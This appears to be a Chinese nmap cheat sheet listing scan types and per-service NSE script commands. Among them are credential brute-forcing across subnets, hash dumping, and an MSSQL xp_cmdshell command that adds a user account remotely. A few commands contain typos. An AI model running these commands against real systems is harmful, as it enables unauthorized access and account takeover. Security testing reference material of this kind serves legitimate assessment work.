TCP端口扫描类型

TCP connect扫描   三次握手完成/全连接/速度慢/易被检测到
TCP SYN扫描 半开扫描/发送SYN包启动TCP会话
TCP FIN扫描 半开扫描/发送SYN包启动TCP会话
TCP XMAS扫描 半开扫描/发送PSH、FIN、URG、TCP标志位为1的数据包

参数

 半开扫描 -sS
操作系统版本探测 -sV
操作系统信息探测 -O
操作系统指纹和版本探测 -A
详细输出扫描情况 -V
指定端口 -p

全端口扫描

nmap -sS -p - -v xx.xx.183.79

常见漏洞盲扫 - XSS | CSRF  

nmap --script vuln ip/domain

端口服务详细探测(可看到包数据)

nmap -sV --script unusual-port domain/ip

C段扫描 

nmap -sP 192.168.1.0/24  #相当于ping

根据域名批量端口探测/爆破(975.txt为域名集合)

 nmap -iL 975.txt --script=auth,vuln,ftp-brute,imap-brute,smtp-brute,pop3-brute,mongodb-brute,redis-brute,ms-sql-brute,rlogin-brute,rsync-brute,mysql-brute,pgsql-brute,oracle-sid-brute,oracle-brute,rtsp-url-brute,snmp-brute,svn-brute,telnet-brute,vnc-brute,xmpp-brute    > scan.txt
对某一个IP进行nmap默认密码暴力破解并扫描    nmap --script=mysql-brute 192.168.157.130

对某一个IP段进行nmap默认密码暴力破解并扫描    nmap --script=mysql-brute 192.168.157.1-    

使用root账号root密码进行mysql密码验证并扫描获取指定IP地址的端口信息以及mysql数据库相关信息    map -sV --script=mysql-databases --script-argsmysqluser=root,mysqlpass=root 192.168.157.130    

检查root空口令    nmap --script mysql-empty-password 192.168.195.130

查找蠕虫病毒 

 nmap -PN -T4 -p139,445 -n -v –script=smb-check-vulns –script-args safe=1 192.168.0.1-254

旁站查询 

 nmap -p80 --script hostmap-ip2hosts.nse 192.168.3.23

探测目标

 svn    nmap --script http-svn-info 192.168.3.0/24
http-wordpress-brute.nse nmap -p80 -sV --script http-wordpress-brute --script-args 'userdb=users.txt,passdb=passwds.txt,http-wordpress-brute.hostname=domain.com,http-wordpress-brute.threads=3,brute.firstonly=true' 192.168.3.0/24

扫描目标网站备份 

 nmap -p80 --script=http-backup-finder 192.168.3.0/24

内网嗅探

  nmap -sn -Pn --script sniffer-detect.nse 192.168.3.0/24

配合shodan接口进行扫描 

 nmap --script shodan-api --script-args 'shodan-api.target=192.168.3.0/24,shodan-api.apikey=SHODANAPIKEY'

服务
ftp

 检查目标ftp是否允许匿名登录/检测目录是否可读写    nmap -p 21 --script ftp-anon.nse -v 192.168.3.23
ftp爆破脚本[默认只会尝试一些比较简单的弱口令 nmap -p 21 --script ftp-brute.nse -v 192.168.3.23
ProFTPD nmap -p 21 --script ftp-vuln-cve2010-4221.nse -v 192.168.3.23
nmap -p 21 --script ftp-vuln-cve2010-4221.nse -v 192.168.3.23
VSFTPD v2.3.4 # nmap -p21--script ftp-vsftpd-backdoor.nse -v192.168.3.23

ssh

 sshv1中间人攻击    nmap -p 22 --script sshv1.nse -v 192.168.3.23

smtp

 爆破    nmap -p 25 --script smtp-brute.nse -v 192.168.3.23
枚举目标smtp服务器的邮件用户名,前提是目标要存在此错误配置 nmap -p 25 --script smtp-enum-users.nse -v 192.168.3.23
Exim 4.70之前版本中的string.c文件中的string_vformat函数中存在堆溢出 "nmap -p 25 --script smtp-vuln-cve2010-4344.nse -v 192.168.3.23
"
Postfix 2.5.13之前版本,2.6.10之前的2.6.x版本,2.7.4之前的2.7.x版本和2.8.3之前的2.8.x版本,存在溢出 nmap -p 25 --script smtp-vuln-cve2011-1720.nse -v 192.168.3.23
Exim dkim_exim_verify_finish() 存在格式字符串漏洞 nmap -p 25 --script smtp-vuln-cve2011-1764.nse -v 192.168.3.23

pop

 爆破    nmap -p 110 --script pop3-brute.nse -v 192.168.3.23

imap

 爆破    nmap -p 143,993 --script imap-brute.nse -v 192.168.3.23

dns

 dns-zone-transfer    nmap -p 53 --script dns-zone-transfer.nse -v 192.168.3.23
nmap -p 53 --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=target.org -v 192.168.3.23
telnet

爆破 nmap -p 23 --script telnet-brute --script-args userdb=myusers.lst,passdb=mypwds.lst,telnet-brute.timeout=8s -v 192.168.3.0/24
smb

 ms17-010    nmap -p445 --script smb-vuln-ms17-010.nse 192.168.3.0/24
smb-vuln-ms08-067.nse smb-vuln-ms10-054.nse smb-vuln-ms10-061.nse

数据库
informix

 爆破    nmap -p 9088 --script informix-brute.nse 192.168.3.23

mysql

 root账号空口令    nmap -p 3306 --script mysql-empty-password.nse -v 192.168.3.23
root弱口令简单爆破 nmap -p 3306 --script mysql-brute.nse -v 192.168.3.23
mysql中所有用户的hash nmap -p 3306 --script mysql-dump-hashes --script-args='username=root,password=root' 192.168.3.23
Mysql身份认证漏洞[MariaDB and MySQL 5.1.61,5.2.11, 5.3.5, 5.5.22] nmap -p 3306 --script mysql-vuln-cve2012-2122.nse -v 192.168.3.23
扫描C段mssql nmap -p 445 --script ms-sql-info.nse -v 203.124.11.0/24
nmap -p 1433 --script ms-sql-info.nse --script-args mssql.instance-port=1433 -v 192.168.3.0/24
扫描IP段mssql sa空密码 nmap -p 1433 --script ms-sql-empty-password.nse -v 192.168.3.0/24

mssql

 sa弱口令爆破    nmap -p 1433 --script ms-sql-brute.nse -v 192.168.3.0/24
mssql 远程执行系统命令 nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd=net user test test add 192.168.3.0/24
导出mssql中所有的数据库用户及密码hash nmap -p 1433 --script ms-sql-dump-hashes -v 192.168.3.0/24

postgresql

 爆破    nmap -p 5432 --script pgsql-brute -v 192.168.3.0/24

oracle

 爆破    nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL  -v 192.168.3.0/24
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL -v 192.168.3.0/24

mongdb

 爆破    nmap -p 27017  --script mongodb-brute 192.168.3.0/24

redis

 爆破    nmap -p 6379 --script redis-brute.nse 192.168.3.0/24

协议
snmp

 爆破C段的snmp     nmap -sU --script snmp-brute --script-args snmp-brute.communitiesdb=user.txt 192.168.3.0/24

ldap

 爆破    nmap -p 389 --script ldap-brute --script-args ldap.base='cn=users,dc=cqure,dc=net' 192.168.3.0/24

xmpp

 爆破    nmap -p 5222 --script xmpp-brute.nse  192.168.3.0/24

pptp

 识别目标pptp版本    nmap -p 1723 --script pptp-version.nse 192.168.3.0/24
中间件

iis

 短文件扫描    nmap -p80 --script http-iis-short-name-brute.nse 192.168.3.0/24
iis 5.0 6.0 webadv写 nmap --script http-iis-webdav-vuln.nse -p80,8080 192.168.3.0/24
iis6.0远程代码执行 nmap -sV --script http-vuln-cve --script-args uri='anotheruri' 192.168.3.0/24
服务器漏洞

bash

 http-shellshock.nse bash远程执行    nmap -sV -p- --script http-shellshock --script-args uri=cgi-binbin,cmd=ls 192.168.3.0/24
工具框架平台

rsync

 爆破    nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.3.0/24

rlogin

 爆破    nmap -p 513 --script rlogin-brute 192.168.3.0/24

vnc

 爆破    nmap --script vnc-brute -p 5900 192.168.3.0/24

pcanywhere

 爆破    nmap -p 5631 --script=pcanywhere-brute 192.168.3.0/24

nessus

 爆破    nmap --script nessus-brute -p 1241 192.168.3.0/24

Mysql

对某一个IP进行nmap默认密码暴力破解并扫描    nmap --script=mysql-brute 192.168.157.130

对某一个IP段进行nmap默认密码暴力破解并扫描    nmap --script=mysql-brute 192.168.157.1-    

使用root账号root密码进行mysql密码验证并扫描获取指定IP地址的端口信息以及mysql数据库相关信息    map -sV --script=mysql-databases --script-argsmysqluser=root,mysqlpass=root 192.168.157.130    

检查root空口令    nmap --script mysql-empty-password 192.168.195.130

nexpose

 爆破    nmap --script nexpose-brute -p 3780 192.168.3.0/24

应用安全 - 工具使用 - Nmap的更多相关文章

  1. 『安全工具』Nmap 强悍的端口扫描工具

    作为时下流行的端口扫描工具,Nmap有因其扫描的隐密性有“端口扫描之王”之称 上图是黑客帝国(The Matrix)中崔妮蒂用Nmap入侵核发电站的能源管理系统 0x 01 Nmap介绍 Nmap是一 ...

  2. Linux—主机扫描工具(Nmap)

    Nmap包含五项基本功能: 主机探测 (Host Discovery) 端口扫描 (Port Scanning) 版本检测 (Version Detection) 操作系统侦测 (Operating ...

  3. 安全测试 - 端口嗅探工具Nmap

    Nmap 在官网下载nmap端口检测工具https://nmap.org/,nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端. 使用: 通过cmd命令:nmap www.5i5j.c ...

  4. NMAP分布式扫描工具dnmap

    NMAP分布式扫描工具dnmap   NMAP是一款知名的网络扫描工具.它提供丰富和强大的网络扫描功能.但很多时候,需要渗透测试人员从多个终端发起扫描任务,以快速扫描大型网络,或规避IP限制等安全策略 ...

  5. 渗透测试工具Nmap从初级到高级使用教程

    本文由阿德马翻译自国外网站,请尊重劳动成果,转载请注明出处,谢谢 Nmap是一款网络扫描和主机检测的非常有用的工具.Nmap是不局限于仅仅收集信息和枚举,同时可以用来作为一个漏洞探测器或安全扫描器.它 ...

  6. 渗透测试工具Nmap从初级到高级

    Nmap是一款网络扫描和主机检测的非常有用的工具. Nmap是不局限于仅仅收集信息和枚举,同时可以用来作为一个漏洞探测器或安全扫描器.它可以适用于winodws,linux,mac等操作系统.Nmap ...

  7. 扫描工具nmap介绍

    NMap,也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包. 简介 nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端.确定哪些服务运行在哪些连接端,并且推 ...

  8. nmap 端口扫描工具

    nmap工具介绍 一.简介 nmap :也就是Network Mapper,最早是Linux下的网络扫描和嗅探工具包. nmap是一个网络连接端扫描软件,用来扫描网上电脑开放的网络连接端.确定哪些服务 ...

  9. [推荐] 网络侦查工具 NMAP 简单入门

    [推荐] 网络侦查工具 NMAP 简单入门 # 前言 作为一只运维开发,总是避不开要和网络打交道的.尤其是当自身能力到达瓶颈,开始从事云计算以求突破.会有搭建多台虚拟机的需要,这时候如果在手工的查询 ...

随机推荐

  1. C++函数声明与定义

    一个C++函数,如果没有函数声明而只有函数定义,程序照样运行,但要求这个函数定义必须放在main函数之前,否则编译按照从上到下的顺序扫描下来,就会出现编译器不认识它的情况. 如果一个程序同时有函数声明 ...

  2. Spring基础05——Spring依赖注入的三种方式

    Spring支持3种依赖注入的方式:属性注入.构造器注入.工厂 1.属性注入 属性注入即通过setter方法注入Bean的属性或依赖的对象.使用<property>元素,使用name属性指 ...

  3. 下载xlsx文件打开一直提示文件已损坏

    这是office受保护视图导致的原因所造成的,按照以下操作,问题就不是问题了 解决办法如下: 1.在打开excel2018数据表格时,出现提示“文件已损坏,无法打开”,点击确定按钮 2.进入空白程序界 ...

  4. CentOS7搭建FastDFS+Nginx

    1. FastDFS 介绍 FastDFS是一个开源的分布式文件系统,她对文件进行管理,功能包括:文件存储.文件同步.文件访问(文件上传.文件下载)等,解决了大容量存储和负载均衡的问题.特别适合以文件 ...

  5. Codeforces 960 二进制构造子序列 完全二叉树shift模拟 主席树/MAP DP

    A #include <bits/stdc++.h> #define PI acos(-1.0) #define mem(a,b) memset((a),b,sizeof(a)) #def ...

  6. test dword ptr [eax],eax ; probe page.局部数组变量定义所分配的最大空间为1M

    问题的出现 使用VS2017编写程序时,程序编译可以通过,但运行时就会弹出错误 经过查证发现: 这跟局部数组变量定义所分配的最大空间设置大小有关. 局部变量的申请空间是存放于栈中,windows里默认 ...

  7. Java并发-CycliBarrier

    栅栏类似于闭锁,它能阻塞一组线程直到某个事件的发生.栅栏与闭锁的关键区别在于,所有的线程必须同时到达栅栏位置,才能继续执行.闭锁用于等待事件,而栅栏用于等待其他线程.package com.examp ...

  8. noip考前抱佛脚 数论小总结

    exCRT 求解韩信点兵问题,常见的就是合并不同\(mod\). 先mo一发高神的板子 for(R i=2;i<=n;++i){ ll Y1,Yi,lcm=Lcm(p[i],p[1]); exg ...

  9. Qt 打包release发布问题

    除了使用depens查看exe依赖的dll,本文使用qt5.13自带的打包工具windeployqt.exe tips: demo.exe(x86) :C:\Qt\Qt5.12.3\5.12.3\ms ...

  10. 【usaco 2013 open yinyang】阴阳

    题目 Farmer John 正在在计划自己的农场漫步.他的农场的结构就像一棵树:农场有N个谷仓(1<= N <=100,000),分别由N-1条路链接.这样,他便可以通过这些谷仓间的道路 ...